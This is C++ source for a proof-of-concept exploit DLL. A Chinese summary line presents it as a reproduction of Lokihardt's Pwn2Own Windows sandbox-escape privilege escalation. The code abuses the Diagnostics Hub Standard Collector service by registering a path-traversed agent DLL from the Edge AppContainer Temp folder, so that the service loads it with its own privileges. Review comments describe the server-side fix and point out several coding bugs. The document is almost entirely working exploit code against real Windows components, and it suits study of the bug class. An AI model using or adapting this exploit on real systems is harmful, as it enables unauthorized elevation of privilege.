摘要：重現了韓國小哥Lokihardt在Pwn2Own上使用的沙箱逃逸提權漏洞（Windows）。
#include <windows.h>
#include <atlbase.h>
#include "DiagnosticsHub.StandardCollector.Runtime_h.h"

// Proof-of-concept DLL. On process attach it talks to the Diagnostics Hub
// Standard Collector service (an out-of-process COM server, per the header
// name and CLSCTX_LOCAL_SERVER below), creates a collection session whose
// scratch directory is the calling user's Edge AppContainer Temp folder, and
// then registers an "agent" DLL by a relative path that walks up with "..\"
// segments into that same Temp folder. Presumably the service resolves and
// loads the agent path with its own privileges — that is the weakness this
// PoC exercises. The defensive fix for this bug class is server-side:
// canonicalize the agent path and confine it to an allowed directory before
// loading anything.
//
// NOTE(review): all of this runs inside DllMain under the loader lock.
// CoInitialize, CoCreateInstance and cross-process COM calls are documented
// as unsafe there; a robust implementation would run this from a thread
// started after the DLL is loaded. Nothing acquired here is released
// (no CoUninitialize, no Release on either interface pointer).
BOOL APIENTRY DllMain(HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
    {
        WCHAR user_name[MAX_PATH] = { 0 };
        // NOTE(review): GetUserNameW takes the buffer size in characters, but
        // sizeof(user_name) is a byte count, i.e. twice the real capacity;
        // ARRAYSIZE(user_name) is the correct value. The return value is also
        // unchecked, so on failure user_name stays empty and every path built
        // from it below is malformed.
        DWORD name_size = sizeof(user_name);
        GetUserName(user_name, &name_size);

        CoInitialize(0);   // HRESULT ignored; never balanced by CoUninitialize.

        HRESULT hr;
        CLSID clsid_hub;                            // CLSID of the collector service (from string below).
        IID iid_IStandardCollectorService;          // IID of IStandardCollectorService (from string below).
        IStandardCollectorService * i_StandardCollectorService;   // uninitialized until CoCreateInstance succeeds

        CLSIDFromString(L"{42CBFAA7-A4A7-47BB-B422-BD10E9D02700}", &clsid_hub);
        CLSIDFromString(L"{0D8AF6B7-EFD5-4F6D-A834-314740AB8CAA}", &iid_IStandardCollectorService);

        // Activate the service out-of-process.
        hr = CoCreateInstance(clsid_hub, NULL, CLSCTX_LOCAL_SERVER, iid_IStandardCollectorService, (LPVOID*)&i_StandardCollectorService);
        if (FAILED(hr))
        {
            // NOTE(review): only logs; execution falls through and
            // i_StandardCollectorService is dereferenced uninitialized below.
            // printf also relies on <stdio.h> arriving transitively via
            // atlbase.h, and %08x with a LONG HRESULT is strictly %08lx.
            printf("CoCreateInstance failed: %08x\n", hr);
        }

        SessionConfiguration session_config;
        ICollectionSession * i_CollectionSession = { 0 };
        WCHAR scratch_path[MAX_PATH] = { 0 };

        // Scratch directory inside the Edge AppContainer package's Temp folder.
        // NOTE(review): wsprintf is unbounded; a long user name can push this
        // past MAX_PATH. Prefer a bounded formatter such as StringCchPrintfW.
        wsprintf(scratch_path, L"C:\\Users\\%ws\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\Temp", user_name);
        session_config.Type = CollectionType_Etw;
        session_config.Location = CollectionLocation_Local;
        session_config.Flags = SessionConfigurationFlags_None;
        session_config.LifetimeMonitorProcessId = 0;
        session_config.SessionId = {};
        // NOTE(review): if CollectorScratch is a raw BSTR, this stores a pointer
        // that the temporary CComBSTR frees at the end of the statement
        // (dangling by the time CreateSession runs) — confirm the field type;
        // CComBSTR::Detach() or SysAllocString would be the safe form.
        session_config.CollectorScratch = CComBSTR(scratch_path);
        session_config.ClientLocale = 0;

        hr = i_StandardCollectorService->CreateSession(&session_config, nullptr, &i_CollectionSession);
        if (FAILED(hr))
        {
            // NOTE(review): same pattern — logs and continues with a null
            // i_CollectionSession, which AddAgent then dereferences.
            printf("CreateSession failed: %08x\n", hr);
        }

        WCHAR dll_path[MAX_PATH] = { 0 };
        GUID guid = GUID_NULL;

        // Agent path is relative and traverses upward with "..\" segments into the
        // user's AppContainer Temp folder; the directory it is resolved against
        // is the service's, not this process's (not visible from this file).
        // Same unbounded-wsprintf caveat as scratch_path above.
        //wsprintf(dll_path, L"..\\..\\..\\..\\Users\\%ws\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\Temp\\EoP.dll", user_name);
        wsprintf(dll_path, L"..\\..\\..\\..\\Users\\%ws\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\Temp\\EoP.dll", user_name);
        hr = i_CollectionSession->AddAgent(dll_path, &guid);
        if (FAILED(hr))
        {
            printf("AddAgent failed: %08x\n", hr);
        }

        break;
    }
    case DLL_THREAD_ATTACH:
        break;
    case DLL_THREAD_DETACH:
        break;
    case DLL_PROCESS_DETACH:
        break;
    // NOTE(review): no default case; unknown reason codes fall out silently.
    }

    // Always reports success, even when every COM call above failed.
    return TRUE;
}